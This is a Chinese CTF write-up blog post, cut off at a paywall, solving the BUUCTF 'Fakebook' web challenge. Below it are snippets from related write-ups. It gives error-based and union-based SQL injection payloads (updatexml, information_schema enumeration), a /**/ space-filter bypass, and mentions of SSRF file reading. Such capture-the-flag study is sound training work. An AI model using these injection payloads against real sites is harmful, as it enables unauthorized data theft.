[BUUCTF][网鼎杯 2018]Fakebook

于 2022-10-25 15:25:58 发布
阅读量664 收藏
点赞数
分类专栏: CTF 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35697696/article/details/127510576
版权

写在前面:BUUCTF限制了请求速率,所以扫描工具不太好使,但是字典数量巨大,因此有些文件路径是真的不太好扫出来的🥶

FakeBook

信息收集

预期解

登录/注册

Sql注入

登录和注册位置都没试出注入点
注册反而遇到点问题,后面路径发现源码才知道blog要些xx.xx的格式

发现注入点,过滤了union select能通过/**/替代空格绕过,也可以通过报错注入,以下会提供两种方式

# 方法1 报错注入
# 查字段数
?no=-1 order by 4
# 爆库名
?no=1 and updatexml(1,concat('~',database()),1)
# 表名
?no=1 and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)
# 查字段
?no=1 and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database())),1)
# 返回:[*] query error! (XPATH syntax error:
 '~no,username,passwd,data')
# 查内容一个个看
?no=1 and updatexml(1,concat('~',(select data from fakebook
最低0.47元/天 解锁文章
朋克归零膏
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF Fakebook
venu_s的博客
03-24 296
Fakebook 1.题目 2.先随便注册一下,并查看网页源码,发现如下页面 3.判断注入点,发现?no=1存在注入 4.判断字段数,order by 长度为4(这里对空格进行了过滤,可以用++代替) ?no=0++order++by++4--+ 5.得到当前库名 ?no=0++union++select++1,database(),3,4--+ 6.得到表名 ?no=0++union...
BUUCTF-[网鼎杯 2018]Fakebook
qq_43006864的博客
04-20 1721
打开题目 点击login,一个登陆界面。没啥发现。 点击join。注册一个账号看看。 这里可以看到:http://46021289-6e25-4fee-b4db-f69979ef4362.node4.buuoj.cn:81/view.php?no=1 盲猜可以sql注入。测试了一下,貌似还不需要闭合,直接接语句就可以。 测试出来字段为4,开始尝试获取数据库信息。 貌似有waf,尝试使用/**/绕过。 成功绕过,并且发现注入点...
BUUCTF WEB Fakebook
A_dmin的博客
12-20 640
BUUCTF WEB Fakebook 进入页面发现有个登录有个注册!!! 注册一个账号登录: 有个参数,下面应该是会显示你网址的博客地址!!! 有参数肯定是进行SQL注入尝试!!发现存在盲注!no=1=1=1与no=1=0=1回显是不一样的!! 不过好像还有报错注入!!有四个字段!! 后面发现空格被过滤了??使用/**/代替,存在报错注入: 尝试注入: ...
BUUCTF WEB FAKEBOOK
qq_41696858的博客
10-31 189
继续复习之旅,攻防世界暂时不做了,最近比较忙,等过一段时间继续刷 这题之前攻防世界刷过,考的是sql注入,注册页面没看出来啥,正常注册,zhaoxian,zhaoxian 然后点进去发现有一个get参数,直接一个单引号过去,发现回显报错了,那么sql注入没跑了 关键怎么利用,order by到5,开始报错,说明四列 union select触发了waf,经尝试,/**/绕过空格即可过 尝试payload:?no=-1 union/**/select 1,2,3,4# 提示无法反序列化,而username回显
fakebook:Facebook的克隆
05-23
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
mp12_social_network_fakebook_person
05-15
Mp12-社交网络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
在“Fakebook-Day2:在第2天之后,在完善蓝图功能之前”这个项目中,我们主要探讨的是如何利用Python编程语言来构建一个类似Facebook的社交网络平台。在第二天的开发阶段,我们的重点在于完善项目的蓝图(Blueprint)...
webcrawler:一个简单的Java实现的网络爬虫,支持自动登录
06-24
第一个网络爬虫介绍Webcrawler 是一个简单的网络爬虫。 它实现了自动登录和内容获取的基本功能。... 如果登录失败,程序将被终止。 登录后,爬虫将开始获取它可以在网站内找到的每个链接。 过滤器用于阻止爬虫获取外部...
BUUCTF[网鼎杯 2018]Fakebook
qq_62078839的博客
03-16 2369
打开连接,发现登录要注册,那我们先注册个账号 发现可以点进去查看 习惯性查看网页源代码 点击发现打开了我们注册博客的地址,猜测可能存在SSRF,但现在还不知道如何使用,我们再来审查其他地方 发现个注入点,尝试sql注入 首先查列数 payload:?no=1 order by 5 发现报错 将列数改为4,发现正确 payload:no=-1 union/**/select 1,2,3,4 发现回显是第二个字段的位置,注意这里出现的序列化,可...
BUUCTF[网鼎杯2018]Fakebook
weixin_45253622的博客
05-22 696
我们注册一个账号看看: 注册成功如下: 这里需要注意,王小帥是可以点击的,url变为:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1我们试试sql注入; payload:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1' 没什么卵用,我们访问ro...
buuctf-Fakebook(报错注入)
m0_62094846的博客
04-04 2393
blog要有http:// 可以尝试sql注入,但是我用sqlmap注入不了,不知道为什么 然后尝试手工,试过很多闭合方式都不行,后来发现直接就是整型注入 正确的情况不会有回显,错误会有,试试报错注入 这里有个之前没见过的过滤方式,过滤了0x7e,要用~(本来以为过滤了updatexml,想用另一个来着) 查当前数据库 ?no=1 and updatexml(1,concat('~',(database()),'~'),1)# 查所有数据库 ?no=1 and...
BUUCTF——[网鼎杯 2018]Fakebook
Ho1aAs‘s Blog
05-24 403
文章目录利用点解题无 利用点 SQL注入 SSRF读文件 解题 打开环境,没有任何提示,先试试基础功能,注册一个号,回到主页可以点进去看记录 发现URL是拼接上序号的,试试SQL注入,发现是字符型闭合单引号的注入 先看看字段数 无 ...
buuctf-[网鼎杯 2018]Fakebook
qq_42728977的博客
12-17 1085
[网鼎杯 2018]Fakebook考点复现法1,load_file()法2,纯sql注入总结参考 考点 sql注入 复现 法1,load_file() 注册登陆之后 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 可能存在注入点,尝试,发现确实有 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 un
BUUCTF [网鼎杯 2018]Fakebook 1
weixin_45642610的博客
01-19 4721
BUUCTF [网鼎杯 2018]Fakebook 1 join(注册)一个账号,按用户名进入主页 发现注入点no no=1 order by 4#没事 no=1 order by 5#报错,有4列 no=-1 union/**/select 1,2,3,4#过滤了(union select)用/**/代替空格 回显位是2,注意到有反序列化函数。 爆表名 no=-1 union/**/select 1,group_concat(table_name),3,4 from information_sc
BUUCT-WEB-Fakebook
迷风小白
07-08 4083
Fakebook 扫描目录发现存在robots.txt和flag.php,访问发现源码泄露/user.php.bak user.php.bak <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct(...
BUUUCTF刷题记录 Fakebook
m0_46576074的博客
05-17 261
[网鼎杯 2018]Fakebook 进入页面 查表 view.php?no=1 and updatexml(1,make_set(3,’~’,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)# 查列 view.php?no=1 and updatexml(1,make_set(3,’~’,(select group_concat(column_name)
buuctf [网鼎杯 2018]Fakebook 记录
SopRomeo的博客
02-25 3581
首先注册一个账号进去,再查看账户信息,注意url http://2924ddd2-5831-448c-9833-d0aaba7a1fbe.node3.buuoj.cn/view.php?no=1 可能存在sql注入,利用常规的探测,发现他是整形注入,一般的注入行不通,双写绕过不行,试试报错注入, playload:1 and extractvalue(1,concat('~',(select(g...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值